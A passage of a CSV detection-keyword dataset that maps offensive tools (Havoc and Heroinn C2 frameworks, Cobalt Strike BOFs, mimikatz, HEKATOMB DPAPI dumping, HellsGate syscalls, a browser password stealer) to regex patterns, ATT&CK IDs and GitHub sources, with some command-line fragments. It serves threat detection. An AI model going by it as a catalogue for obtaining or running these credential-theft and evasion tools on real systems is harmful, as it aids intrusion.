T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*HavocTalonInteract*",".{0,1000}HavocTalonInteract.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*HavocUi.cpp*",".{0,1000}HavocUi\.cpp.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*HavocUi.h*",".{0,1000}HavocUi\.h.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*HavocUI.hpp*",".{0,1000}HavocUI\.hpp.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*hccapx2john.py*",".{0,1000}hccapx2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*hci_oracle_passwords*",".{0,1000}hci_oracle_passwords.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*hcxdumptool -i wlan1 -o * --active_beacon --enable_status=1*",".{0,1000}hcxdumptool\s\-i\swlan1\s\-o\s.{0,1000}\s\-\-active_beacon\s\-\-enable_status\=1.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*hcxdumptool*",".{0,1000}hcxdumptool.{0,1000}","offensive_tool_keyword","hcxdumptool","Small tool to capture packets from wlan devices. After capturing. upload the uncleaned pcapng here (https://wpa-sec.stanev.org/?submit) to see if your ACCESS POINT or the CLIENT is vulnerable by using common wordlists. Convert the pcapng file to WPA-PBKDF2-PMKID+EAPOL hashline (22000) with hcxpcapngtool (hcxtools) and check if PreSharedKey or PlainMasterKey was transmitted unencrypted","T1040 - T1560 - T1539","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/ZerBea/hcxdumptool","1","1","N/A","N/A","10","1718","385","2024-03-12T07:32:39Z","2018-02-25T08:18:40Z" "*hcxhashtool -i *.hashcat --info stdout*",".{0,1000}hcxhashtool\s\-i\s.{0,1000}\.hashcat\s\-\-info\sstdout.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*hcxpcapngtool --all -o *.hashcat*",".{0,1000}hcxpcapngtool\s\-\-all\s\-o\s.{0,1000}\.hashcat.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*hcxpcapngtool -o *.hashcat *.pcapng*",".{0,1000}hcxpcapngtool\s\-o\s.{0,1000}\.hashcat\s.{0,1000}\.pcapng.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*hd-launch-cmd *",".{0,1000}hd\-launch\-cmd\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","0","N/A","10","10","1102","176","2023-12-07T17:15:48Z","2023-05-21T00:57:43Z" "*headers/exploit.h*",".{0,1000}headers\/exploit\.h.{0,1000}","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/PPLDump_BOF","1","1","N/A","10","10","136","25","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z" "*headers/HandleKatz.h*",".{0,1000}headers\/HandleKatz\.h.{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF port of the research of @thefLinkk and @codewhitesec","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com//EspressoCake/HandleKatz_BOF","1","1","N/A","10","N/A","N/A","N/A","N/A","N/A" "*HeapCrypt-main*",".{0,1000}HeapCrypt\-main.{0,1000}","offensive_tool_keyword","HeapCrypt","Encypting the Heap while sleeping by hooking and modifying Sleep with our own sleep that encrypts the heap","T1055.001 - T1027 - T1146","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/HeapCrypt","1","1","N/A","9","3","228","43","2023-08-02T02:24:42Z","2023-03-25T05:19:52Z" "*HeapEncryptDecrypt.cpp*",".{0,1000}HeapEncryptDecrypt\.cpp.{0,1000}","offensive_tool_keyword","HeapCrypt","Encypting the Heap while sleeping by hooking and modifying Sleep with our own sleep that encrypts the heap","T1055.001 - T1027 - T1146","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/HeapCrypt","1","1","N/A","9","3","228","43","2023-08-02T02:24:42Z","2023-03-25T05:19:52Z" "*HeapEncryptDecrypt.exe*",".{0,1000}HeapEncryptDecrypt\.exe.{0,1000}","offensive_tool_keyword","HeapCrypt","Encypting the Heap while sleeping by hooking and modifying Sleep with our own sleep that encrypts the heap","T1055.001 - T1027 - T1146","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/HeapCrypt","1","1","N/A","9","3","228","43","2023-08-02T02:24:42Z","2023-03-25T05:19:52Z" "*HeapEncryptDecrypt.sln*",".{0,1000}HeapEncryptDecrypt\.sln.{0,1000}","offensive_tool_keyword","HeapCrypt","Encypting the Heap while sleeping by hooking and modifying Sleep with our own sleep that encrypts the heap","T1055.001 - T1027 - T1146","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/HeapCrypt","1","1","N/A","9","3","228","43","2023-08-02T02:24:42Z","2023-03-25T05:19:52Z" "*HeapEncryptDecrypt.vcxproj*",".{0,1000}HeapEncryptDecrypt\.vcxproj.{0,1000}","offensive_tool_keyword","HeapCrypt","Encypting the Heap while sleeping by hooking and modifying Sleep with our own sleep that encrypts the heap","T1055.001 - T1027 - T1146","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/HeapCrypt","1","1","N/A","9","3","228","43","2023-08-02T02:24:42Z","2023-03-25T05:19:52Z" "*HeartBleed*",".{0,1000}HeartBleed.{0,1000}","offensive_tool_keyword","HeartBleed","Heart Bleed scanner ","T1222 - T1110 - T1046","TA0007 - TA0001 - TA0002","N/A","N/A","Web Attacks","https://github.com/TechnicalMujeeb/HeartBleed","1","0","N/A","N/A","1","33","12","2018-04-14T04:21:39Z","2018-04-14T04:06:16Z" "*hekatomb -hashes *",".{0,1000}hekatomb\s\-hashes\s.{0,1000}","offensive_tool_keyword","HEKATOMB","Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them","T1003 - T1555.002 - T1482 - T1087","TA0006 - TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/ProcessusT/HEKATOMB","1","0","N/A","10","5","444","48","2024-05-01T06:31:37Z","2022-09-09T15:07:15Z" "*hekatomb-*.tar.gz*",".{0,1000}hekatomb\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","HEKATOMB","Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them","T1003 - T1555.002 - T1482 - T1087","TA0006 - TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/Processus-Thief/HEKATOMB","1","1","N/A","10","N/A","N/A","N/A","N/A","N/A" "*hekatomb*-hashes *",".{0,1000}hekatomb.{0,1000}\-hashes\s.{0,1000}","offensive_tool_keyword","HEKATOMB","Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them","T1003 - T1555.002 - T1482 - T1087","TA0006 - TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/Processus-Thief/HEKATOMB","1","0","N/A","10","N/A","N/A","N/A","N/A","N/A" "*hekatomb-*-py3-none-any.whl*",".{0,1000}hekatomb\-.{0,1000}\-py3\-none\-any\.whl.{0,1000}","offensive_tool_keyword","HEKATOMB","Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them","T1003 - T1555.002 - T1482 - T1087","TA0006 - TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/Processus-Thief/HEKATOMB","1","1","N/A","10","N/A","N/A","N/A","N/A","N/A" "*hekatomb.ad_ldap*",".{0,1000}hekatomb\.ad_ldap.{0,1000}","offensive_tool_keyword","HEKATOMB","Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them","T1003 - T1555.002 - T1482 - T1087","TA0006 - TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/ProcessusT/HEKATOMB","1","0","N/A","10","5","444","48","2024-05-01T06:31:37Z","2022-09-09T15:07:15Z" "*hekatomb@thiefin.fr*",".{0,1000}hekatomb\@thiefin\.fr.{0,1000}","offensive_tool_keyword","HEKATOMB","Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them","T1003 - T1555.002 - T1482 - T1087","TA0006 - TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/Processus-Thief/HEKATOMB","1","1","N/A","10","N/A","N/A","N/A","N/A","N/A" "*hekatomb_dump*",".{0,1000}hekatomb_dump.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*HellHall-main.zip*",".{0,1000}HellHall\-main\.zip.{0,1000}","offensive_tool_keyword","HellsHall","Performing Indirect Clean Syscalls","T1106","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Maldev-Academy/HellHall","1","1","N/A","8","5","413","61","2023-04-19T06:10:47Z","2023-01-03T04:43:05Z" "*hello %3e c:\\temp\\test.txt*",".{0,1000}hello\s\%3e\sc\:\\\\temp\\\\test\.txt.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*Hello from DCShadow*",".{0,1000}Hello\sfrom\sDCShadow.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*Hello from DllMain-PROCESS_ATTACH in Merlin!*",".{0,1000}Hello\sfrom\sDllMain\-PROCESS_ATTACH\sin\sMerlin!.{0,1000}","offensive_tool_keyword","merlin-agent-dll","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent-dll","1","0","N/A","10","10","49","13","2024-04-23T04:53:57Z","2021-04-17T16:58:24Z" "*Hello from KaynLdr*",".{0,1000}Hello\sfrom\sKaynLdr.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynLdr","1","0","N/A","9","5","494","101","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z" "*Hello from Malicious DLL*",".{0,1000}Hello\sfrom\sMalicious\sDLL.{0,1000}","offensive_tool_keyword","dropper","Generates Malicious Office Macro Enabled Dropper for DLL SideLoading and Embed it in Lnk file to bypass MOTW","T1059 - T1574.002 - T1218 - T1559.003","TA0002 - TA0005 - TA0009","N/A","N/A","Resource Development","https://github.com/SaadAhla/dropper","1","0","N/A","10","3","209","47","2024-03-24T16:47:03Z","2024-03-24T16:36:46Z" "*Hello From sadsad Team*",".{0,1000}Hello\sFrom\ssadsad\sTeam.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","197","30","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z" "*Hello, you have been pwned!*",".{0,1000}Hello,\syou\shave\sbeen\spwned!.{0,1000}","offensive_tool_keyword","persistence_demos","Demos of various (also non standard) persistence methods used by malware","T1546 - T1547 - T1133 - T1053 - T1037","TA0003 ","N/A","N/A","Persistence","https://github.com/hasherezade/persistence_demos","1","0","N/A","7","3","215","47","2023-03-05T17:01:14Z","2017-05-16T09:08:47Z" "*HelloReflectionWorld.exe*",".{0,1000}HelloReflectionWorld\.exe.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","8","2","2024-04-29T01:58:07Z","2021-12-10T15:04:35Z" "*hellsgate.asm*",".{0,1000}hellsgate\.asm.{0,1000}","offensive_tool_keyword","HellsGate","The Hell's Gate technique is a method employed by malware to hide its malicious behavior and avoid detection. This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/am0nsec/HellsGate","1","1","N/A","N/A","9","845","117","2021-06-28T15:42:36Z","2020-06-02T17:10:21Z" "*HellsGate.exe*",".{0,1000}HellsGate\.exe.{0,1000}","offensive_tool_keyword","HellsGate","The Hell's Gate technique is a method employed by malware to hide its malicious behavior and avoid detection. This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/am0nsec/HellsGate","1","1","N/A","N/A","9","845","117","2021-06-28T15:42:36Z","2020-06-02T17:10:21Z" "*HellsGate.sln*",".{0,1000}HellsGate\.sln.{0,1000}","offensive_tool_keyword","HellsGate","The Hell's Gate technique is a method employed by malware to hide its malicious behavior and avoid detection. This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/am0nsec/HellsGate","1","1","N/A","N/A","9","845","117","2021-06-28T15:42:36Z","2020-06-02T17:10:21Z" "*HellsGate.vcxproj*",".{0,1000}HellsGate\.vcxproj.{0,1000}","offensive_tool_keyword","HellsGate","The Hell's Gate technique is a method employed by malware to hide its malicious behavior and avoid detection. This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/am0nsec/HellsGate","1","1","N/A","N/A","9","845","117","2021-06-28T15:42:36Z","2020-06-02T17:10:21Z" "*Hell'sHall.vcxproj*",".{0,1000}Hell\'sHall\.vcxproj.{0,1000}","offensive_tool_keyword","HellsHall","Performing Indirect Clean Syscalls","T1106","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Maldev-Academy/HellHall","1","0","N/A","8","5","413","61","2023-04-19T06:10:47Z","2023-01-03T04:43:05Z" "*Hell'sHall-Clang&NoCrt.zip*",".{0,1000}Hell\'sHall\-Clang\&NoCrt\.zip.{0,1000}","offensive_tool_keyword","HellsHall","Performing Indirect Clean Syscalls","T1106","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Maldev-Academy/HellHall","1","0","N/A","8","5","413","61","2023-04-19T06:10:47Z","2023-01-03T04:43:05Z" "*help\dll.txt*",".{0,1000}help\\dll\.txt.{0,1000}","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","10","10","947","121","2024-02-01T13:51:09Z","2022-10-28T09:00:35Z" "*helpers.gpoddity_smbserver*",".{0,1000}helpers\.gpoddity_smbserver.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/synacktiv/GPOddity","1","0","N/A","9","3","246","21","2023-10-14T16:06:34Z","2023-09-01T08:13:25Z" "*Henkru/cs-token-vault*",".{0,1000}Henkru\/cs\-token\-vault.{0,1000}","offensive_tool_keyword","cobaltstrike","In-memory token vault BOF for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Henkru/cs-token-vault","1","1","N/A","10","10","136","25","2022-08-18T11:02:42Z","2022-07-29T17:50:10Z" "*henriksb/ExtensionSpoofer*",".{0,1000}henriksb\/ExtensionSpoofer.{0,1000}","offensive_tool_keyword","ExtensionSpoofer","Spoof file icons and extensions in Windows","T1036 - T1027.005 - T1218","TA0005 - TA0040","N/A","N/A","Phishing","https://github.com/henriksb/ExtensionSpoofer","1","0","N/A","9","2","159","61","2023-02-24T19:03:57Z","2017-11-11T16:02:17Z" "*henry-richard7/Browser-password-stealer*",".{0,1000}henry\-richard7\/Browser\-password\-stealer.{0,1000}","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","1","N/A","10","4","368","59","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z" "*Here are the oneliners for reverse shell using rpc named pipes*",".{0,1000}Here\sare\sthe\soneliners\sfor\sreverse\sshell\susing\srpc\snamed\spipes.{0,1000}","offensive_tool_keyword","fuegoshell","Fuegoshell is a powershell oneliner generator for Windows remote shell re-using TCP 445","T1059.001 - T1203","TA0002 - TA0011 - TA0008","N/A","N/A","Lateral Movement","https://github.com/v1k1ngfr/fuegoshell","1","0","N/A","10","1","6","1","2024-04-27T09:03:28Z","2024-04-27T08:06:03Z" "*Heroinn FTP*",".{0,1000}Heroinn\sFTP.{0,1000}","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","0","N/A","10","10","617","209","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z" "*heroinn_client*",".{0,1000}heroinn_client.{0,1000}","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","10","10","617","209","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z" "*heroinn_core*",".{0,1000}heroinn_core.{0,1000}","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","10","10","617","209","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z" "*heroinn_ftp*",".{0,1000}heroinn_ftp.{0,1000}","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","10","10","617","209","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z" "*heroinn_shell*",".{0,1000}heroinn_shell.{0,1000}","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","10","10","617","209","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z" "*heroinn_util*",".{0,1000}heroinn_util.{0,1000}","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","10","10","617","209","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z" "*HeroinnApp*",".{0,1000}HeroinnApp.{0,1000}","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","10","10","617","209","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z" "*HeroinnProtocol*",".{0,1000}HeroinnProtocol.{0,1000}","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 